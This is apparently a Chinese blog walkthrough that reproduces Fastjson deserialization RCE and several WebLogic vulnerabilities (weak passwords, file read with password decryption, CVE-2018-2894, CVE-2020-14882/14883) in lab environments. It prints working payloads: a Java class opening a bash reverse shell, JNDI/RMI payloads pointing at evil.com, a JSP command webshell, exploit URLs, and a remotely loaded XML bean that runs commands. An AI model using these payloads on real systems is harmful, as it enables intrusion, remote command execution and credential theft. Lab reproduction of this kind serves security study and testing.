Java安全-Java Vuls(Fastjson、Weblogic漏洞复现)
ccwgpt 2025-01-10 12:15 77 浏览 0 评论
复现几个 Java 的漏洞,文章会分多篇这是第一篇,文章会分组件和中间件两个角度进行漏洞复现
复现使用环境
- Vulhub
- VulFocus
组件
Fastjson 1.2.24 反序列化 RCE
FastJson 库是 Java 的一个 Json 库,其作用是将 Java 对象转换成 json 数据来表示,也可以将 json 数据转换成 Java 对象
在 1.2.24 版本的 Fastjson 出现了一个反序列化的漏洞,fastjson 在解析 json 的过程中,支持使用 autoType 来实例化某一个具体的类,并调用该类的 set/get 方法来访问属性
因为目标环境是 Java 8u102,没有 com.sun.jndi.rmi.object.trustURLCodebase 的限制,我们可以使用 com.sun.rowset.JdbcRowSetImpl 的利用链,借助 JNDI 注入来执行命令,漏洞利用过程与 Log4j、jackson jdni 注入一致
1.创建恶意类并生成 class 字节码文件
import java.lang.Runtime;
import java.lang.Process;
public class Test {
static {
try {
Runtime r = Runtime.getRuntime();
Process p = r.exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/IP/PORT 0>&1"});
p.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
复制代码
注意代码中 IP 为 VPS IP 端口为 NC 监听端口,在命令行中使用命令生成字节码文件
2.将字节码文件上传至 VPS,使用 python 开一个 web 服务器,确保可以下载 class 文件
python3 -m http.server 8888
复制代码
3.借助 marshalsec 项目,启动一个 RMI 服务器,监听9999 端口,并指定加载远程类 Test.class
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://evil.com/#TouchFile" 9999
复制代码
4.向靶场服务器发送信息 Payload,带上 RMI 的地址:
POST / HTTP/1.1
Host: your-ip:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://evil.com:9999/TouchFile",
"autoCommit":true
}
}
复制代码
特别注意:在 Java 漏洞复现中需要特别注意 HTTP 请求头真的会影响,所以复现中使用上面代码块中的 payload
如果直接是 burp 抓包,改请求方式,不会利用成功,如下图,因为 Content-Type 不对
执行步骤如图所示
正是因为在 vps 上面需要开三个服务区所以显得很乱
Fastjson 1.2.47 反序列化 RCE
Fastjson 于 1.2.24 版本后增加了反序列化白名单,而在 1.2.48 以前的版本中,攻击者可以利用特殊构造的 json 字符串绕过白名单检测,成功执行任意命令
环境用 vulhub
执行如下命令启动一个spring web项目,其中使用 fastjson 作为默认 json 解析器:
docker-compose up -d
复制代码
环境启动后,访问 http://your-ip:8090 即可看到一个json对象被返回,我们将content-type修改为 application/json 后可向其POST新的JSON对象,后端会利用fastjson进行解析
vulhub 提供的目标环境是什么 openjdk:8u102 ,这个版本没有 com.sun.jndi.rmi.object.trustURLCodebase 的限制,可以使用 rmi 进行命令执行
复现方法一致,payload 利用其缓存机制可实现对未开启 autotype 功能的绕过
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://evil.com:9999/Exploit",
"autoCommit":true
}
}
复制代码
中间件
weblogic 漏洞不止这几个
Weblogic 文件读取&war包上传(Vulhub)
环境所在 vulhub 目录,weblogic 挺大的可以用 vulfocus 的环境
/vulhub-master/weblogic/weak_password
复制代码
开启环境后,访问 http://your-ip:7001/console ,即为weblogic后台
记录一下这个样子
环境存在弱口令:
- weblogic
- Oracle@123
weblogic常用弱口令: cirt.net/passwords?c…
如果存在弱口令就可以直接进入后台上传 war 部署后门就行了,这也是 Java 中间件普遍的利用方法
这套环境模拟了一个任意文件下载漏洞,对并不是说 weblogic 的任意文件读取
http://your-ip:7001/hello/file.jsp?path=/etc/passwd
复制代码
尝试读取敏感文件
weblogic密码使用AES(老版本3DES)加密,对称加密可解密,只需要找到用户的密文与加密时的密钥即可。这两个文件均位于base_domain下,名为 SerializedSystemIni.dat 和 config.xml ,在本环境中为 ./security/SerializedSystemIni.dat 和 ./config/config.xml (基于当前目录 /root/Oracle/Middleware/user_projects/domains/base_domain )
尝试读取 SerializedSystemIni.dat 这是一个二进制文件,所以一定要用 burpsuite 来读取,用浏览器直接下载可能引入一些干扰字符。在 burp 里选中读取到的那一串乱码,右键 copy to file 就可以保存成一个文件
config/config.xml 是 base_domain 的全局配置文件,所以乱七八糟的内容比较多,找到其中的 <node-manager-password-encrypted> 的值,即为加密后的管理员密码
对于这个密码在 vulhub 的环境中也提供了解密工具,GitHub 上也有整理好的工具, 链接
weblogic_decrypt.jar
这个工具要和 lib 在一个目录启动
密码一致,解密成功,可以登录后台上传 webshell
1.首先生成后门 test.jsp
<%
if("123".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
复制代码
构造 war 包
jar cvf test.war test.jsp
复制代码
值得注意的是,我们平时 tomcat 用的 war 包不一定能够成功,你可以将你的 webshell 放到本项目的 web/hello.war 这个压缩包中
使用这种方法要注意应用目录在 war 包中 WEB-INF/weblogic.xml 里指定(因为本测试环境已经使用了 /hello 这个目录,所以你要在本测试环境下部署 shell,需要修改这个目录,比如修改成其他的)
进入后台,部署,点击安装
点击上载文件,选择文件
存放路径
/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/upload/test.war
复制代码
一路 next 直到完成部署,访问后门
Weblogic 任意文件上传 CVE-2018-2894
WebLogic 管理端未授权的两个页面存在任意上传 getshell 漏洞,可直接获取权限。两个页面分别为 /ws_utc/begin.do,/ws_utc/config.do,Web Service Test Page,在 “生产模式” 下默认不开启,所以该漏洞有一定限制
环境启动后,访问 http://your-ip:7001/console ,即可看到后台登录页面。
执行 docker-compose logs | grep password 可查看管理员密码,管理员用户名为 weblogic
登录后台页面,点击 base_domain 的配置,在“高级”中开启“启用 Web 服务测试页”选项,开启了的就存在此漏洞了
漏洞存在于 http://your-ip:7001/ws_utc/config.do
可以发现此界面访问无需登录,设置 Work Home Dir为 /u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
将目录设置为 ws_utc 应用的静态文件css目录,访问这个目录是无需权限的,这一点很重要
然后点击安全 -> 增加,然后上传 webshell,并抓包
查看返回包
或者不抓包上传后 F12 审查元素
然后访问
http://your-ip:7001/ws_utc/css/config/keystore/[时间戳]_[文件名]
复制代码
直接可以执行命令了,weblogic 真养活半个安全圈
Weblogic 管理控制台未授权远程命令执行漏洞(CVE-2020-14882,CVE-2020-14883)
CVE-2020-14882 允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883 允许后台任意用户通过 HTTP 协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个 GET 请求在远程 Weblogic 服务器上以未授权的任意用户身份执行命令
复现环境使用 vulfocus
1.首先测试权限绕过漏洞(CVE-2020-14882),访问以下URL,即可未授权访问到管理后台页面:
http://your-ip:7001/console/css/%252e%252e%252fconsole.portal
复制代码
登录之后目前是权限最低的用户,无法安装应用也无法执行代码
2.利用到第二个漏洞CVE-2020-14883 通过 HTTP 协议执行任意命令。这个漏洞的利用方式有两种:
- 通过 com.tangosol.coherence.mvel2.sh.ShellSession
- 直接访问如下URL,即可利用 com.tangosol.coherence.mvel2.sh.ShellSession 执行命令
- http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success1');") 复制代码
- 这个利用方法只能在 Weblogic 12.2.1 以上版本利用,因为 10.3.6 并不存在 com.tangosol.coherence.mvel2.sh.ShellSession 类
- 通过 com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext
- 这是一种更为通杀的方法,最早在 CVE-2019-2725 被提出,对于所有 Weblogic 版本均有效。
- 首先,我们需要构造一个XML文件,并将其保存在Weblogic可以访问到的服务器上,如 http://example.com/rce.xml :
- <?xml version="1.0" encoding="UTF-8" ?> <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder" init-method="start"> <constructor-arg> <list> <value>bash</value> <value>-c</value> <value><![CDATA[touch /tmp/success2]]></value> </list> </constructor-arg> </bean> </beans> 复制代码
- 然后通过如下URL,即可让Weblogic加载这个XML,并执行其中的命令:
- http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://example.com/rce.xml") 复制代码
- 这个利用方法也有自己的缺点,就是需要Weblogic的服务器能够访问到恶意XML
相关推荐
- 一个基于.Net Core遵循Clean Architecture原则开源架构
-
今天给大家推荐一个遵循CleanArchitecture原则开源架构。项目简介这是基于Asp.netCore6开发的,遵循CleanArchitecture原则,可以高效、快速地构建基于Ra...
- AI写代码翻车无数次,我发现只要提前做好这3步,bug立减80%
-
写十万行全是bug之后终于找到方法了开发"提示词管理助手"新版本那会儿,我差点被bug整崩溃。刚开始两周,全靠AI改代码架构,结果十万行程序漏洞百出。本来以为AI说没问题就稳了,结果...
- OneCode低代码平台的事件驱动设计:架构解析与实践
-
引言:低代码平台的事件驱动范式在现代软件开发中,事件驱动架构(EDA)已成为构建灵活、松耦合系统的核心范式。OneCode低代码平台通过创新性的注解驱动设计,将事件驱动理念深度融入平台架构,实现了业务...
- 国内大厂AI插件评测:根据UI图生成Vue前端代码
-
在IDEA中安装大厂的AI插件,打开ruoyi增强项目:yudao-ui-admin-vue31.CodeBuddy插件登录腾讯的CodeBuddy后,大模型选择deepseek-v3,输入提示语:...
- AI+低代码技术揭秘(二):核心架构
-
本文档介绍了为VTJ低代码平台提供支持的基本架构组件,包括Engine编排层、Provider服务系统、数据模型和代码生成管道。有关UI组件库和widget系统的信息,请参阅UI...
- GitDiagram用AI把代码库变成可视化架构图
-
这是一个名为gitdiagram的开源工具,可将GitHub仓库实时转换为交互式架构图,帮助开发者快速理解代码结构。核心功能一键可视化:替换GitHubURL中的"hub...
- 30天自制操作系统:第六天:代码架构整理与中断处理
-
1.拆开bootpack.c文件。根据设计模式将对应的功能封装成独立的文件。2.初始化pic:pic(可编程中断控制器):在设计上,cpu单独只能处理一个中断。而pic是将8个中断信号集合成一个中断...
- AI写代码越帮越忙?2025年研究揭露惊人真相
-
近年来,AI工具如雨后春笋般涌现,许多人开始幻想程序员的未来就是“对着AI说几句话”,就能轻松写出完美的代码。然而,2025年的一项最新研究却颠覆了这一期待,揭示了一个令人意外的结果。研究邀请了16位...
- 一键理解开源项目:两个自动生成GitHub代码架构图与说明书工具
-
一、GitDiagram可以一键生成github代码仓库的架构图如果想要可视化github开源项目:https://github.com/luler/reflex_ai_fast,也可以直接把域名替换...
- 5分钟掌握 c# 网络通讯架构及代码示例
-
以下是C#网络通讯架构的核心要点及代码示例,按协议类型分类整理:一、TCP协议(可靠连接)1.同步通信//服务器端usingSystem.Net.Sockets;usingTcpListene...
- 从复杂到优雅:用建造者和责任链重塑代码架构
-
引用设计模式是软件开发中的重要工具,它为解决常见问题提供了标准化的解决方案,提高了代码的可维护性和可扩展性,提升了开发效率,促进了团队协作,提高了软件质量,并帮助开发者更好地适应需求变化。通过学习和应...
- 低代码开发当道,我还需要学习LangChain这些框架吗?| IT杂谈
-
专注LLM深度应用,关注我不迷路前两天有位兄弟问了个问题:当然我很能理解这位朋友的担忧:期望效率最大化,时间用在刀刃上,“不要重新发明轮子”嘛。铺天盖地的AI信息轰炸与概念炒作,很容易让人浮躁与迷茫。...
- 框架设计并不是简单粗暴地写代码,而是要先弄清逻辑
-
3.框架设计3.框架设计本节我们要开发一个UI框架,底层以白鹭引擎为例。框架设计的第一步并不是直接撸代码,而是先想清楚设计思想,抽象。一个一个的UI窗口是独立的吗?不是的,...
- 大佬用 Avalonia 框架开发的 C# 代码 IDE
-
AvalonStudioAvalonStudio是一个开源的跨平台的开发编辑器(IDE),AvalonStudio的目标是成为一个功能齐全,并且可以让开发者快速使用的IDE,提高开发的生产力。A...
- 轻量级框架Lagent 仅需20行代码即可构建自己的智能代理
-
站长之家(ChinaZ.com)8月30日消息:Lagent是一个专注于基于LLM模型的代理开发的轻量级框架。它的设计旨在简化和提高这种模型下代理的开发效率。LLM模型是一种强大的工具,可以...
你 发表评论:
欢迎- 一周热门
- 最近发表
- 标签列表
-
- 框架图 (58)
- flask框架 (53)
- quartz框架 (51)
- abp框架 (47)
- springmvc框架 (49)
- 分布式事务框架 (65)
- scrapy框架 (56)
- shiro框架 (61)
- 定时任务框架 (56)
- java日志框架 (61)
- mfc框架 (52)
- abb框架断路器 (48)
- beego框架 (52)
- java框架spring (58)
- grpc框架 (65)
- tornado框架 (48)
- 前端框架bootstrap (54)
- orm框架有哪些 (51)
- 知识框架图 (52)
- ppt框架 (55)
- 框架图模板 (59)
- 内联框架 (52)
- cad怎么画框架 (58)
- ssm框架实现登录注册 (49)
- oracle字符串长度 (48)